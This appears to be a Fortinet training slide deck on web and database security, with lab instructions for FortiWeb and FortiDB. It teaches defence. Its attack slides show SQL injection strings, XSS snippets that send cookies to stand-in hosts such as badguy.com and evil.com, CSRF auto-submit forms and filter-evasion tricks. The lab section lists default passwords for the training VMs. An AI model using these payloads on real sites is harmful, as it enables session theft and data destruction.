LATAM MX Fortiweb FortiDB Training-V1.1

LATAM SE TEAM FortiWeb and FortiDB Training
AGENDA
1 2
Introduction to Web Application Security Database Vulnerabilities & Miss Configurations Owasp Top 10 and PCI-DSS Lab Installation and Setup Introduction to FortiWeb How to PoC FortiWeb FortiWeb Basic & Advanced Troubleshooting Introduction to FortiDB How to PoC FortiDB FortiDB Basic & Advanced Troubleshooting
3
4 5 6
7
7 8 9
Introduction to Web Applications
What are Web Applications ?
Internet
What are Web Applications ?

What are web applications?
Web applications are public and internet facing applications Accessed using a standard browser and provide webmail, online retail sales, online auctions, wikis and many other functions They provide major e-commerce and business driving tools for organizations
Web server data center
Data Center Perimeter
Web apps are written for efficient delivery of content In most cases web apps are not developed with security in mind
Leaves apps open to exploit Potential exposure of sensitive information Attacks can range from simple defacement to identity theft, credit card and other PII theft
Front End Web Servers
Database Servers
Web Applications Advantages
A Standard Web Browser acts as the Application Client
Web Applications Advantages

Creates a virtual hyperspace
Beyond geographical constraints Break computer hardware and software obstacles Bring the whole world together
A low cost way to Share, maintain, and distribute Information

Intranet
Electronic commerce Customer support
So, what are Client / Server Applications ?

Client (front end):
Presents an interface to the user Gathers information from the user, submits it to a server, then receives, formats, and presents the results returned from the server User needs a specific software to access data on the Server (and a Specific Operating System, etc.) The client connects to the server using specific ports
So, what are Client / Server Applications ?

Server (back end):
A database from which a client requests information Fulfills a request for information by managing the request or serving the requested information to the client Responsible for data storage and management Only allowed users can only retrieve data from server (Firewall policies, access control, etc.)
Why those differences are important ?

Adversaries have fewer obstacles when performing an attack
An infrastructure attack presents all the following obstacles:
A web application attack presents fewer obstacles and elements
Some Web Application Concepts

HTTP is a networking protocol, foundation of the World Wide Web. HTTP functions as request/response protocol HTTP defines nine methods The methods GET and POST are the most widely used
GET Method: Requests a representation of the specified resource. Data is included in the URL requested:
GET http://www.xbank.com/get.html?uid=xxx HTTP/1.1
POST Method: Submits data to be processed to the identified resource. Data is included in the message body
POST /login.php?username=User1&password=pass1 HTTP/1.1
Some Web Application Concepts

HTML documents are usually static But Web Applications need dynamic documents
Search results Database access Context sensitive reply
Client side / Server Side execution Server-side

Action occurs at the server Server runs a set of instructions and return values to the browser
Client-side
Action occurs on the client side (browser) The instructions are executed on users computer
Client Side Scripting

Client side scripts are embedded inside HTML document. They are interpreted by browser. When Web browser encounters a script, it calls a scripting interpreter, which parses and deciphers the scripting code. Provide response to questions and queries without interventions from the server
Validate user data Calculate expressions Link to other applications
Client Side / Application Layer
Goal: Render and present content to the user

Software: Browsers (IE, Safari, Firefox, etc.) Language: HTML/JavaScript, etc.
Server Side Scripting

Allows creation of dynamic web pages Modifies HTML code on the server before sent to client Uses databases such as Access and Oracle Responds to user input
Server Side / Application Layer

Goal: Receive user requests, validate, process and convert them in database requests Software: Web Servers (Apache/IIS), Application Servers (Tomcat, WebSphere) Language: Java/ASP/PHP
Database / Data Layer
Goal: Store and manage access to data.

Software: DBMS (Oracle, MS SQL Server, MySQL, etc) Language: SQL
Common Web Application Problems

Input that requires validation
HTTP parameters HTTP headers
Database/filesystem input
Configuration
Output that requires encoding

HTML / CSS / Javascript / XML / Images
Web Application Security
Are your Web Applications Secure ?
SQL Injections
Injection attacks trick an application into including unintended commands in the data send to an interpreter. Interpreters
Interpret strings as commands. Ex: SQL, LDAP, XPath
Key Idea
Input data from the application is executed as code by the interpreter
SQL Injections
Attacker
User
1. 2. 3. 4. 5.
6.
App sends form to user Attacker submits form with SQL exploit data Application builds string with exploit data Application sends SQL query to DB DB executes query, including exploit, sends data back to application Application returns data to user.
Form
Pass
or 1=1--
Firewall
Web Server
DB Server
SQL Injection Attack # 1
Unauthorized Access Attempt:

password = or 1=1 --
SQL statement becomes:

select count(*) from users where username = user and password = or 1=1 -Checks if password is empty OR 1=1, which is always true, permitting access.
SQL Injection Attack # 2
Database Modification Attack:

password = foo; delete from table users where username like %
DB executes two SQL statements:

select count(*) from users where username = user and password = foo
delete from table users where username like %
Exploits of a MOM
Cross Site Scripting

Cross Site Scripting (XSS) is a type of exploit where information from one context, where it is not trusted, can be inserted into another context, where it is The trusted website is used to store, transport, or deliver malicious content to the victim The target is to trick the client browser to execute malicious scripting commands JavaScript, VBScript, ActiveX, HTML, or Flash Caused by insufficient input validation
Cross Site Scripting can
Steal cookies
Hijack of users session Unauthorized access
Modify content of the web page

Inserting words or images Misinform Bad reputation
Spy on what you do Network Mapping XSS viruses
Cross Site Scripting - Reflected

1
Send e-mail with <script> tags embedded in the link.
http://mybank.com/ account.php?variable=><script>document.lo cation=http://www.badguy.com/cgi-bin/ cookie.cgi%20+document.cookie</script>
Follows link and the script executes
2
www.badguy.com Cookie collector
Malicious content dose not get stored in the server The server bounces the original input to the victim without modification
Cross Site Scripting - Persistent

Public forum web site
1
Attacker Upload malicious scripting commands to the public forum
Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script>
Downlaod malicious code

Victim
Browse
The server stores the malicious content The server serves the malicious content in its original form
Cross Site Request Forgery

Cross-site request forgery, also known as a one-click attack or session riding, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
Case Study: MySpace Samy Worm

Samy Kamkars JS worm from 2005 Payload
but most of all, Samy is my hero
Exponential growth
7 hours, ~200 infected 12 hours, ~10K infected
17 hours, >1M infected

MySpace shuts down

Encoded javascript inside <div> Disguised as java script Bypassed security using eval(document.body.inne + rHTML)

MySpace implement blacklist Blacklist many tags, but not <a>, <div>, and some others. So: <div style="background:url('javascript:alert(1)')"> Blacklist the word javascript. So: <div style="background:url('java script:alert(1)')"> Blacklist innerHTML. document.body.innerHTML gives page source. So: alert(eval('document.body.inne' + 'rHTML')
Some Reflections
64% of 10M of security incidents had port 80 as entry points
DATA
Database Vulnerabilities and Miss Configurations
What about the Database ?
Database Heist
RSA
Proprietary information about RSA's SecurID authentication tokens. (2011)
June 7, 2011 RSA Faces Angry Users After Breach The nations biggest banks and large technology companies like SAP rushed Tuesday to accept RSA Securitys offer to replace their ubiquitous SecurID tokens as many computer security experts voiced frustration with the company.
Sony -PlayStation Network customers

More than 100 million customer account details and 12 million unencrypted credit card numbers. (2011)
Tue Apr 26, 2011 Sony suffered a massive breach in its video game online network that led to the theft of names, addresses and possibly credit card data belonging to 77 million user accounts in what is one of the largest-ever Internet security break-ins.
HBGary Federal
60,000 confidential emails, executive social media accounts, and customer information.(2011)
2011-03-01 The embattled CEO of HBGary Federal has resigned his post three weeks after Anonmyous hacked into the companys network and stole thousands of e-mail messages.
Epsilon
E-mail databases from 2 percent of the firm's 2,500 corporate clients. (2011)
April 02, 2011 Major Breach at Epsilon, the World's Largest Permission Based Email Marketing Services Company, Affects Wide Range of Major Brands - List Continues to Grow
Common DB Vulnerabilities / Miss Configurations

Default, blank, and weak username/password Removing default, blank and weak log-in credentials is a important first step for filling chinks in your database armor. The bad guys are keeping track of default accounts, and they'll use them when they can.

Extensive user and group privileges Privileges have not to be given to users who will eventually collect them like janitors collect keys on their keychains. Make users part of groups or roles and administering the rights through those roles, which can be managed collectively more easily than if users were assigned direct rights.

Unnecessarily enabled database features
Database installation comes with add-on packages of all shapes and sizes that are mostly going to go unused by any one organization. Database security is about reducing attack surfaces. Disable or uninstall those unused packages.

Broken configuration management Databases have many different configuration choices and considerations available to DBAs to fine-tune performance and enhanced functionalities. Unsafe configurations could be enabled by default or turned on for convenience of DBAs or application developers.

Denial of Service / Buffer overflows Buffer overflow are exploited by flooding input sources with far more characters than an application was expecting (like adding 100 characters into an input box asking for a SSN) Database vendors have worked hard to fix the glitches that allow these attacks to occur ( Thats why patching is so critical)
Regulatory Environment
Cross industry Regulation/ PCI SOX High level requirements for databases PID data access monitoring in databases Auditing Financial database transactions to ensure integrity of financial statements
Vertical /Gov.
Regulation(s)
High level requirements for databases
Finance
Healthcare Pharma. States Federal
GLBA, Basel II
HIPAA CFR part 11 CA law 1386 FISMA(NIST 80053A)
Activity monitoring/Audit of customer records and account information residing in databases

Motoring/Auditing access to patient data residing in databases Motoring/Auditing access to drug research data in databases Motoring/Auditing access to PID data residing in databases(for privacy of personal information) Assessment and Implement various IT internal controls for Databases
DB Activity and Monitory Requirements

Securing Confidential Data
Social Security, Credit Card, Revenue numbers all held in databases and applications (ERP, CRM, SCM, custom applications)
Automation of Auditing and Compliance

Reporting for SOX, PCI and other regulations
Change Control
Keep track of all changes related to database structures (DDL) and users (DCL)
Virtualization
Support both virtualized and non-virtualized environments
Efficient Deployment and Management

Low TCO
OWASP Top 10 2010
OWASP Top 10 - 2010

1. Injection 2. Cross site scripting (XSS) 3. Broken authentication and session management 4. Insecure direct object reference 5. Cross site request forgery (CSRF) 6. Security miss configuration 7. Insecure cryptographic storage 8. Failure to restrict URL access 9. Insufficient transport layer protection 10. Unvalidated redirects and forwards
A1 - Injections
DB
Client
Appl
Shell
Pgm
CPU
A1 - Injections
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'"; id="foo" SELECT * FROM accnts WHERE ID='foo'; id="foo';DROP accnts;--" SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
A2 Cross Site Scripting
Browser Appl DB
Browser
(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>"; CC=123456789" <input name='cc' value='123456789'> CC=123456789"><script>window.location=http://evil.com? x=document.cookie</script> <input name='cc' value='123456789><script> window.location=http://evil.com?x=document.cookie </script>'>
A3 Broken Authentication
Unpredictable passwords, sessions-ID, securityquestions No sessions-id/credentials i URL Avoid session-fixation Time out of sessions & logout buttons Different sessions id outside/inside TLS No clear text passwords
A4 Insecure Direct Object Reference
<SELECT name=period> <OPTION>2010q1</OPTION> <OPTION>2011q2</OPTION> </SELECT> period=2011q2
period=2011q3
<img src="http://example.com/transferFunds?amount=1500 &destinationAccount=attackersAcct#width="0" height="0" /> <body onload="document.forms[0].submit()"> <form method="POST" action="https://bank.com/fn"> <input type="hidden" name="sp" value="8109"/> </form>
A6 Security Miss Configurations
Patching
OS Application Frameworks / libraries
Disable unnecessary services Stack traces Configuration
A7 Insecure Cryptographic Storage
Keep track on sensitive data Password one-way-hashed & salted Password/Key management
TLS key pass phrase M2M lsenord (obfuscation)
A8 Failure to restrict URL access
/user/getAccounts /admin/getAccounts
A9 Insufficient Transport Layer Protection
Use SSL/TLS No mixed content Use secure cookies
Example FireSheep exploits poor solutions
A10 Unvalidated Redirects and Forwards
http://www.vuln.com/redir.asp?=http://www.links.com http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
PCI-DSS Application Security Requirements
Web Application Security and PCI
Requirement 6 Develop and maintain secure systems and applications

Patching Configuration Development lifecycle Testing Production
Sub-requirement 6.3
Develop software applications based on industry best practices and incorporate information security throughout the software development life cycle. 6.3.1 Testing of all security patches 6.3.2 Separate development, test, and production environments 6.3.3 Separation of duties between development, test, and production 6.3.4 Live PANs are not used for testing or development 6.3.5 Removal of test data and accounts before production 6.3.6 Removal of custom application accounts, usernames, and passwords 6.3.7 Review of custom code prior to release to production or customers
Sub-requirement 6.3
Develop all web applications based on secure coding guidelines such as the Open Web Application Security Project (OWASP) guidelines. Review custom application code to identify coding vulnerabilities.
6.5.1 Unvalidated input 6.5.2 Broken access control (for example, malicious use of user IDs) 6.5.3 Broken authentication and session management (use of account credentials and session cookies) 6.5.4 Cross-site scripting (XSS) attacks 6.5.5 Buffer overflows 6.5.6 Injection flaws (for example, structured query language (SQL) injection) 6.5.7 Improper error handling 6.5.8 Insecure storage 6.5.9 Denial of service 6.5.10 Insecure configuration management
Sub-requirement 6.6
Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security Installing an application layer firewall in front of web-facing applications.
Sub-requirement 6.6 - Clarifications
Application Firewall = Web Application Firewall (WAF)

Not an application-layer firewall What makes a WAF acceptable for PCI?
Meet all applicable PCI DSS requirements React appropriately to threats Inspect web application input and respond Prevent data leakage Enforce both positive and negative security models Inspect Hypertext Markup Language (HTML), Dynamic HTML (DHTML), and Cascading Style Sheets (CSS)
Initial Lab Configuration
Lab Topology
VM Database & FortiDB IP: 2.2.2.20/24 Windows XP Administrator/fortidb1!$ FortiDB admin/fortidb1!$
VM Web Server: IP: 2.2.2.21/24 Ubuntu 10 xuser/xuser
Host Machine: 2.2.2.1/24
FortiWeb: IP: 2.2.2.15/24 FortiWeb-VM admin/(blank password)
Vmnet 1 Host-Only Network
Preparing the VM Environment

From the USBs provided by Fortinet, download the compressed VMs:
FWB_VM64bit
HTTP_Server
DB_Server
And the FortiDB Installer

FDB_X86
You will need:

VMWare: Workstation 7/8/9 RAM: 4096 Mb
Hard Disk: 20 Gb
Hyper Threading enabled
Customize VMWare Environment

Edit Network Interfaces
VMnet1 (Host only): 2.2.2.0/24
Virtual Machines Connections

Go to VM > Settings Edit Network Adapter (1)
Point it to VMNET 1
Set the IP addresses as shown in the diagram

Windows DB Server Ubuntu HTTP Server FortiWeb The Host Machine
FortiWeb Initial Configuration

Press the Enter key once to get a new prompt, and log in using the default FortiWeb-VM administrator name, admin. No password for administrator, press Enter when prompted. Use CLI to configure the IP address of a virtual interface (port1)
config system interface edit port1 set ip 2.2.2.15/24 End
Lab Flows
One-Arm HTTP Proxy Topology Give us enough flexibility for our Labs VM Database & FortiDB IP: 2.2.2.20/24 Windows XP Administrator/fortidb1!$ FortiDB 4.2.1 admin/fortidb1!$

Send Traffic through the FortiWeb
FortiWeb: IP: 2.2.2.15/24 FortiWeb-VM build0414 admin/(blank password)
Lab Flows
One-Arm HTTP Proxy Topology Give us enough flexibility for our Labs VM Database & FortiDB IP: 2.2.2.20/24 Windows XP Administrator/fortidb1!$ FortiDB 4.2.1 admin/fortidb1!$
This flat network deployment not recommended in a production environment since a client can easily bypass FortiWeb

Send Traffic straight to the Web Server
FortiWeb: IP: 2.2.2.15/24 FortiWeb-VM build0414 admin/(blank password)
Xbank Online Banking Application

Web Application: PHP/Apache Database: MS SQL Server Login URL:

http://2.2.2.21/xbank/index.html
Login: hsimpson Password: 1234
Xbank Navigation Flow
index.html
Redirect to index.php?p=login.ht ml
show_profile.php
Show customer information
save_profile.php
Save changed customer information
topFrame.html
Top Frame
list_accounts.php
List customers associated accounts
list_activity.php
List account activity
index.php
Frameset
login.html
Login Page
verify_admin.php
Authenticate customer
list_cards.php
List customers associated cards
bottomFrame.html
Bottom Frame
show_transaction. php
Show transfer information
save_transa ction.php
Make transfer
Xbank Database Diagram
XBANK_CUSTOMER customer_id customer_login customer_password customer_fname customer_lname customer_email customer_address customer_since
XBANK_ACCOUNT account_id account_number account_type account_balance account_currency customer_id branch_id
XBANK_BRANCH branch_id branch_name branch_address
XBANK_CARD card_id card_number card_type card_cvd card_expiration
XBANK_ACCOUNT_CARD account_id card_id
XBANK_ACTIVITY activity_id account_id activity_timestamp activity_type activity_amount activity_status
FortiWeb Servers Configuration

Physical Server: This is the real HTTP server (real IP address) Virtual Server: This represent the HTTP server as its seen by external network devices (similar to a Virtual IP) Protected Server: Represents all IP addresses, hostnames, or FQDN that might come in the Host field of the HTTP header
FortiWeb Servers Configuration

A note about Protected Servers!

Its important in multi-homed scenarios:

Same Virtual IP Same Physical IP
Protected hosts allow to define different policies for different sites.
Be careful with NATed environments

When accessed by IP address Host field value wont be the same as the Virtual IP address
Physical Server Setup
2. Unique object name 3. Physical IP Address
1. Create a new Physical Server Object
Virtual Server Setup
2. Unique Object Name 3. Virtual IP address 4. Listening Interface 1. Create a new Virtual Server Object
Protected Servers Setup
2. Unique Object Name 3. Default Action = Deny 4.Click OK to save 5. After saving click Create New
1. Define Protected Servers
Protected Servers Setup (2)
1. Hostname used by client 2. Accept HTTP Traffic with hostname 3. Click OK to save
Protected Servers Setup (3)
Final Results
Create a Web Policy
2. Click Create New to create a new Server Policy
1. Select Server Policy
Create a Web Policy (2)

Policies are the glue that join Physical Servers, Virtual Servers, Protected Hosts and Protection Profiles. What are we protecting and how 1. Complete your policy as defined in the left image 2. Leave other fields as default 3. Click OK to save
Checking the Configuration

1. Enter virtual IP and URL path to test HTTP Proxy Settings
Checking the Configuration

1. After accessing the XBANK application, check your ARP table
Windows: run arp a in a command window

Linux/Mac: run arp an in a terminal
2. Note the MAC addresses for the IP address of your FortiWeb and your Virtual IP. Are the same?, why?
Access using FQDN

1. Add an entry to your hosts table so www.xbank.com is resolved with 2.2.2.50 (Virtual IP)
Windows: %WINDIR%\System32\drivers\etc\hosts Linux\Mac: /etc/hosts
2. Ping www.xbank.com. Does it work? 3. Access www.xbank.com using your browser. Does it work?. Why? 4. Add a new entry in your protected server to accept requests to www.xbank.com
Final Results
Final Results
FortiDB Installation (1)

Login to the your virtual machine with an administrator account Execute FortiDB installer and follow on screen instructions

Select installation path or leave default: C:\FortiDB

Select FortiDB internal repository. Use Derby in this case

Leave communication ports by default

Verify installation by logging in to FortiDB:
URL: http://2.2.2.20:9100/ UID: admin
PWD: fortidb1!$
FortiDB Initial Setup
FortiDB admin Initial Setup fortidb1!$ LAB
Monitoring xbankapp_db
1. Navigate to Targets
2. Click Add to specify a new DB Target
Monitoring xbankapp_db (2)

5. Validate test result
1. Fill required information according to the values in the figure
2. Complete credentials (sa/fortidb1!$)
4. Test Connection
3. Save
2. Click on the database target
1. Navigate to Monitoring Management

4. Validate Test Result
1. Select Collection Method 3. Test 2. Specify Trace Folder location
Path to Trace Folder: C:\Program Files\Microsoft SQL Server\MSSQL10.XTREME_DB\MSSQL\Log
5. Save
1. Go to Alert Policy Groups (Double Click)
2. Select Monitoring Policy Groups
3. Save

1. Go to Alert Policies tab (Double Click) 2. Click check box to enable all policies
3. Click Enable to save

1. Navigate to General Tab
2. Select Start monitoring when FortiDB starts & Click the Start Monitoring Button
3. Save
Monitoring check
3. You should end up with a green monitoring status indicator
1. Navigate back to Monitoring Management
Introduction to FortiWeb
What is Application Security ?

Application life-cycle focus: (Mitigating control)
Design Development Deployment Upgrade Maintenance Difficult Lengthy Expensive Legacy apps? Proprietary Software Off the Shelf Cloud Offering
Ideal but too late

Who has responsibility?

Application controls focus: (Compensating Control)

Mitigation of threats (technical / functional) Web applications security policy
Application Security Needs New Approach

Network firewalls detect network attacks
Inspect IP and port
Network Firewall
IPS products detect known signatures only

Signature evasion is possible No protection of SSL traffic No real HTTP understanding (headers, parameters, etc) No application awareness No user awareness High rate of false positives
IPS/Deep Packet Inspection Firewalls
FortiWeb
Web Application Firewall
Network layer (OSI 1-3)
Application layer (OSI 4-7)
Only Web Application Firewalls can detect and block application attacks!
Introducing - FortiWeb Web Application Firewall

WAF
Web Application Firewall - WAF

Secures web applications to help customers meet compliance requirements
Web Vulnerability Scanner

Scans, analyzes and detects web application vulnerabilities
Application Delivery
Assures availability and accelerates performance of critical web applications
Secures Web Applications
Scans and Detects Web Vulnerabilities
Optimizes Application Delivery
FortiGuard Subscription Services

Real-Time Security Protection
FortiWeb Security Service subscription keeps your FortiWeb automatically up to date with:
Hundreds of application signatures Updates with new application signatures, Malicious robots, suspicious URL patterns and web vulnerability scanner patterns
Global Distributed Network

100+ threat research professionals Eight global locations Automated updates to Fortinet customers
FortiWeb Antivirus Service subscription automated content updates for file upload scanning
Robust 24 x 7 x 365 Real-Time Global Intelligence
FortiWeb Flexible Deployment Options

Layer II - Transparent Inspection and True Transparent Proxy
Easy deployment - No need to re-architect network, full transparency Fail Open Interface Supports content modification for both requests and replies from the server Advanced URL rewriting capabilities HTTPS offloading Enhanced load balancing schemes Zero network latency Blocking capabilities using TCP resets Ideal for initial product evaluations, nonintrusive network deployment
FortiWeb
Web Application Servers
Reverse Proxy
FortiWeb
Non Inline Deployment SPAN port
High Availability
Active / Passive failover
Full configuration synchronization Seamless fail-over No down time
Configuration Sync
Sync FortiWeb devices across networks Allows managing policies across multiple devices from a central location Seamless integration into already existing HA/LB environments
FortiWeb
Server Farm
Disaster Recovery
FortiWeb Product Family

Mid-Enterprise Deployments 100 Mbps HTTP throughput 10,000 transactions per second Large Enterprise Deployments ASIC based Acceleration - FortiModule-CP7 500 Mbps HTTP throughput 27,000 transactions per second Large Enterprise/ Service Provider Deployments ASIC based Acceleration - FortiModule-CP7 1 Gbps HTTP throughput 40,000 transactions per second Hot-swap redundant AC-Power, 2*1 TB storage 6 x 10/100/1000 copper (+ 2x Gbps SFP for 3000CFsx) Large Enterprise/ Service Provider Deployments ASIC based Acceleration - FortiModule-CP7 Hardware based DLP acceleration 2 Gbps HTTP throughput 70,000 transactions per second Hot-swap redundant AC-Power, 2*1 TB storage 6 x 10/100/1000 copper, 2x Gbps SFP interfaces
FortiWeb-400C
FortiWeb-1000C
FortiWeb-3000C/3000CFsx
FortiWeb-4000C
FortiWeb-VM
Deploy FortiWeb in a virtualized environment
Mitigates blind spots Protects web applications regardless of connection origin Provides visibility to internal connections as well Same functionality as appliance
DMZ
Public Zone
Requirement
Licenses Hypervisor Memory CPU 10/100/1000 Interfaces Storage Capacity
Min needed for FortiWeb-VM

2-vCPU, 4-vCPU, 8-vCPU VMware ESXi/ESX 3.5/4.0/4.1/5.0 Min. 1024 Min. 2 virtual CPUs Min. 2 Max. 4virtual NICs Min. 40G
Servers / DMZ
FortiWeb Desktops / Virtual Private Appliance
Virtualized Data Center
Real Time Dashboard
FortiWeb provides a real time dashboard

Traffic monitor per application Attack Event history per application Latest Alerts Appliance state
Data Analytics Geo IP Analysis & Security

Analyses web app usage based on geographic location and server access Dissect traffic based on Hit, Data and Attack type Easily block access from a country using right click Map view or List view Provides a graphical interface that helps organizations understand application trends both from a user and server perspective
FortiAnalyzer Integration
Centralized logging, reporting and analysis for multiple FortiWeb devices
* Starting From FortiAnalyzer MR3
Acceleration
Integrated ASIC based hardware SSL offloading offload CPU intensive SSL computing from server to FortiWeb
Hardware-based key exchange and bulk encryption Purpose built SSL processing Full certificate management Advanced certification verification and revocation capabilities
TCP Connection Multiplexing
FortiWeb
Data Compression
Compress poorly optimised content to minimise impact on network resources and reduce application delivery latency Allows efficient bandwidth utilization and response time to users by compressing data retrieved from servers Compresses files using gzip Compression rate depends on data type and character redundancy
FortiWeb
Load Balancing
Intelligent, application aware layer 7 load balancing Support for HTTP/HTTPS only Variety of Load Balancing algorithms
Round Robin Weighted Round Robin Least Connection HTTP Session Based Round Robin
Connection persistence
Persistence timeout value
Flexible health checks

Physical Server monitoring via HTTPS, HTTP, TCP, Ping Content based health checks with regex support WSDL or Content routing statements
Web Services balancing
Advanced Rewriting Capabilities

Content Routing - route traffic based on:
IP Host URL
Rewriting and Redirection capabilities

Host URL Referrers
Rewrite reply content
Absolute links
Any required content Multiple content types supported
Web Application Scanner

Easily scan your applications for web vulnerabilities
Common vulnerabilities SQL Injection Cross Site Scripting Source code disclosure OS Commanding
Enhanced/Basic Mode Authentication options Granular crawling capabilities Schedule and on demand scanning
FortiWeb
Web Application Scanner

Vulnerability Reports

Scan summary Vulnerability by severity Vulnerability by categories Application Vulnerabilities Common Vulnerabilities
Crawling information URLs accepting input External Links
Server Information
Email reports automatically Updates via FortiGuard Complements WAF for PCI DSS 6.6
FortiWeb Auto Learn

Understands Application Structure
Models elements from actual traffic
Builds baseline based on URLs, parameters, HTTP methods
Automatically Understands Real behavior

Can form fields/parameters be modified by users? What are the length and type of each form field? What characters are acceptable (min, max, average)? Is a form field required or optional?

Provides recommendations and graphs
What about those web app dedicated DDoS attacks?

Application based DDoS is on the increase accounting for a quarter of all DDoS attacks Under the radars bandwidth threshold Targeting specific web app/protocol flaws rather than bandwidth consumption
CPU intensive SQL queries to backend DB
Writing to hard disks

Server specific Slowloris - Sends legitimate, but partial, never ending requests
Slow based and legitimate request attacks Using tools that can be easily downloaded from the internet such as HOIC and LOIC Using botnets and automatic tools to reach mass Sometimes camouflaging real data breach attempts
SQL Injection primarily
Zombie Botnet Many become one
FortiWeb DoS/DDoS Protection Application and Network Based

Analyzes requests originating from different users based on different characteristics such as IP and cookie Sophisticated mechanism understands whether these are real users or automated attacks (HOIC, LOIC tools) Application layer 4 different policies
HTTP Access Limit - Limits the amount of HTTP requests per second from a
certain IP cookie
Malicious IPs - Limits the number of TCP connections with the same session HTTP Flood Prevention - Limits the number of HTTP requests per second with
the same session cookie
Real Browser Enforcement - Sets the number of HTTP requests per
TCP connection, per second, to a specific URL before FortiWeb issues a script to the client to validate whether this is a real browser or an automated tool
Network layer 2 different policies

TCP Flood Prevention - Limits the number of TCP connections from the
same source IP address
SYN Cookie Protects against SYN flood attacks
Antivirus File Scanning and File Upload Restriction

Scan file uploads using Fortinets Antivirus engine Regular and extended virus database Updates via FortiGuard with Antivirus service Restricts file type uploads
Data Leak Prevention
FortiWeb monitors all outgoing traffic and protects against:

Information Disclosure
Credit Card theft/misuse
Web Site Anti-Defacement
WAF
Monitors application files at specified time intervals Upon file change detection FortiWeb
Alert Automatically restore
FortiWeb provides protection at all layers

Advanced Protection Custom Security Policies
Custom policies to match on multiple elements URL, Source IP, Header type and value, Thresholds
Antivirus file upload scanning and Data Leak Prevention

Scans uploaded files for viruses and malware (FortiGuard updates) Detects Information Disclosure, credit card and PII leakage
Application and Network Denial of Service Protection (DoS/DDos protection)

Detects and aggregates DoS attacks from multiple vectors
Auto Learn and Validation Rules

Deviations from normal user behavior, automated and customer rules
Application Attack Signatures

Detects known application attacks FortiGuard updates
Protocol Validation
Validates HTTP RFC compliance
Event/Attack/Traffic Alerts
Attack Alerts
Full HTTP request Any access to web applications Any action on FortiWeb device
Traffic Alerts Event Alerts
Reports - Attacks
Out of the box rich and graphical reports Custom reports Scheduled daily, weekly, Monthly or on demand PDF, HTML, Word, TXT, MHT formats
Reports Traffic and Events
Report on any access to the application

Application Hits Service type usage (HTTP/HTTPS) Top sources
Report on any access or change to the FortiWeb device
FortiWeb Value Add

Dramatically reduce the risk of corporate data loss.
Data Leak Prevention
Application Security
HTTP Compliance Application Signatures Auto Learn
Accurate protection with multiple layers of defense Integrated Web Vulnerability Scanner Protects against the OWASP Top 10
Application Delivery
Authentication Load Balancing and Acceleration Compression
Automated management using Auto Learn Baselining Easily deploys in any environment
Multiple deployment options
FortiClient Desktop
Accelerates applications
Application aware Load Balancing Compression ASIC based SSL Acceleration
Vulnerability Assessment
Helps achieve PCI compliance
Hands On How to PoC FortiWeb
Web Protection Profiles Web Protection Profiles
Define what to inspect and how to do it.

Are made of different rules, constraints and settings Are similar to Protection Profiles in the FortiGate configuration
Creating a new Web Protection Profile
2. Click Create New
1. Select: Web Protection Profiles Inline Protection Profile
Creating a new Web Protection Profile (2)

1. Name the Web Protection Profile: xbank_web_protection 2. Leave other fields as default 3. Click OK to save 4. Edit the xbank_web_policy and assign the newly created profile 5. Test accessing the XBANK application
FortiWeb URL Rewriting
FortiWeb URL Rewriting Discussion
URL Rewriting
Without URL rewriting when accessing the XBANK application the end user(s) are required to specify /xbank/ in the URL path, due to the existing directory structure. The URL Rewriting feature removes this requirement. Added Benefit: Transparently hides the internal directory structure from end user(s)
URL entered by end user(s) changes From: To:
URL Rewriting > Creating Rewriting Rules
2. Click Create New
1. Create a New URL Rewriting Rule
URL Rewriting > Creating Rewriting Rules (2)
1. Unique Rule Name 2. What to rewrite 3. Where to rewrite 4. Click OK to save 5. Click Create New to define RegEx
URL Rewriting > Define Regular Expression Match
1. Select which object to match 2. Define the Pattern Match
3. Select condition of the match
A Note on Regular Expressions Matching URL Paths to a regex provides a concise and flexible means for matching strings of text.
Metacharacter Description
[] ^ $ * ? | ()
Matches any single character

Matches a single character contained within the brackets Matches the starting position within the string Matches the ending position within the string Matches the preceding element zero or more times Matches the preceding element zero one time Choice operator matches either the expression before or the expression after the operator Memory. Expressions between parentheses remains in a memory position
URL Rewriting > Creating Rewriting Rules (3)
Specify the new URL path to be used to connect to the defined physical server NOTE: $0 = the first RegEx parameter matched (everything inside the first set of parenthesis)
URL Rewriting > Create a new Rewrite Policy
2. Click Create New
1. Create a new URL Rewriting Policy
URL Rewriting > Create a new Rewrite Policy (2)
3. Unique Policy Name 4. Click OK to Save 5. Click Create New to select and prioritize Rewrite Rule(s)
URL Rewriting > Set Rewrite Rule Priority
1. Set Rule Priority 2. Select Rewrite Rule 3. Click OK to Save
NOTES: (Least Cost Priority exec first)

Priorities determine the execution order of the rewriting rules Lower priority values are executed before higher priority values
URL Rewriting > Set Rewrite Rule Priority
Final Results
URL Rewriting > Associate Rewrite Policy to Protection Profile
2. Edit Protection Profile
1. Navigate to Web Protection Profile
3. Select rewrite policy & Click OK to save
URL Rewriting > Associate Protection Profile to Server Policy
2. Edit Server Policy 1. Navigate to Server Policy
3. Select Web Protection Profile
URL Rewriting Test Configuration

After creating the URL Rewriting Policy, assigning it to the Web Protection Profile xbank_web_protection and applying the Web Protection Profile to the Server Policy xbank_web_policy Test the rewrite by entering www.xbank.com into your browser
Preventing Information Disclosure
Preventing Information Disclosure Discussion and Lab
Information Disclosure 1. Usually one of the first steps taken from malicious users that will attack a system is gathering information about it: Operating System, versions, application types, etc. 2. This gathering process is known as fingerprinting 3. The Server Protection rule Information Disclosure helps prevent the disclosure of this type of information.
Prevent Information Disclosure 1. Point your browser to http://www.xbank.com/xxx.html 2. What did you get as response?. Any problem with it? 3. Sometimes applications give to much information when showing an error.
Prevent Information Disclosure - Configuration
2. Create a New Policy
1. Navigate to Server Protection
Prevent Information Disclosure Configuration (2)
1. 2. 3. 4.
Name the Server Protection Policy: Server_Protection-xbank Enable only the Information Disclosure rule Select the Action of Alert & Erase Click OK to save
Prevent Information Disclosure Configuration (3)

Edit the xbank_web_potection and assign the newly created rule
1. Select New Policy
Test by accessing http://www.xbank.com/xxx.html
